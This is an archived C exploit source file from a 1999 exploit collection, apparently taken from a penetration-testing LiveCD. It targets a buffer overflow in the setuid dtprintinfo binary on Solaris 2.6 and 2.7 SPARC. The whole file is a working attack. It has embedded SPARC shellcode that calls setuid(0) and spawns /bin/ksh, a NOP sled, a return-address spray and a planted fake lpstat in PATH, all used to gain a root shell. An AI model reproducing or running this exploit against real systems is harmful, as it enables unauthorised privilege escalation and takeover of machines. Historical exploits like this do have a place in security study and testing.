home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / remote / dtprint-info.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  2KB  |  69 lines

  1. /*## copyright LAST STAGE OF DELIRIUM aug 1999 poland        *://lsd-pl.net/ #*/
  2. /*## /usr/dt/bin/dtprintinfo                                                 #*/
  3.  
  4. #include <fcntl.h>
  5.  
  6. #define NOPNUM 4000
  7. #define ADRNUM 2000
  8.  
  9. char setuidcode[]=
  10.     "\x90\x08\x3f\xff"     /* and     %g0,-1,%o0           */
  11.     "\x82\x10\x20\x17"     /* mov     0x17,%g1             */
  12.     "\x91\xd0\x20\x08"     /* ta      8                    */
  13. ;
  14.  
  15. char shellcode[]=
  16.     "\x20\xbf\xff\xff"     /* bn,a    <shellcode-4>        */
  17.     "\x20\xbf\xff\xff"     /* bn,a    <shellcode>          */
  18.     "\x7f\xff\xff\xff"     /* call    <shellcode+4>        */
  19.     "\x90\x03\xe0\x20"     /* add     %o7,32,%o0           */
  20.     "\x92\x02\x20\x10"     /* add     %o0,16,%o1           */
  21.     "\xc0\x22\x20\x08"     /* st      %g0,[%o0+8]          */
  22.     "\xd0\x22\x20\x10"     /* st      %o0,[%o0+16]         */
  23.     "\xc0\x22\x20\x14"     /* st      %g0,[%o0+20]         */
  24.     "\x82\x10\x20\x0b"     /* mov     0xb,%g1              */
  25.     "\x91\xd0\x20\x08"     /* ta      8                    */
  26.     "/bin/ksh"
  27. ;
  28.  
  29. char jump[]=
  30.     "\x81\xc3\xe0\x08"     /* jmp     %o7+8                */
  31.     "\x90\x10\x00\x0e"     /* mov     %sp,%o0              */
  32. ;
  33.  
  34. static char nop[]="\x80\x1c\x40\x11";
  35.  
  36. main(int argc,char **argv){
  37.     char buffer[10000],adr[4],*b,*envp[4],display[128];
  38.     int i,fd;
  39.  
  40.     printf("copyright LAST STAGE OF DELIRIUM aug 1999 poland  //lsd-pl.net/\n");
  41.     printf("/usr/dt/bin/dtprintinfo for solaris 2.6 2.7 sparc\n\n");
  42.  
  43.     if(argc!=2){
  44.         printf("usage: %s xserver:display\n",argv[0]);
  45.         exit(-1);
  46.     }
  47.  
  48.     *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+4152+2000+2000;
  49.  
  50.     sprintf(display,"DISPLAY=%s",argv[1]);
  51.     envp[0]=display; 
  52.     envp[1]=(char*)strdup("PATH=.:/usr/bin"); 
  53.     envp[2]=(char*)strdup("HOME=/"); 
  54.     envp[3]=0;
  55.  
  56.     if((fd=open("./lpstat",O_WRONLY|O_CREAT|O_TRUNC,0777))==-1) exit(-1);
  57.     write(fd,"echo system for xxx:\n",23);
  58.     close(fd);
  59.  
  60.     b=buffer; 
  61.     for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
  62.     for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
  63.     for(i=0;i<strlen(setuidcode);i++) *b++=setuidcode[i];
  64.     for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
  65.     *b=0;
  66.  
  67.     execle("/usr/dt/bin/dtprintinfo","lsd","-p",buffer,0,envp);
  68. }
  69. /*                    www.hack.co.za           [3 August 2000]*/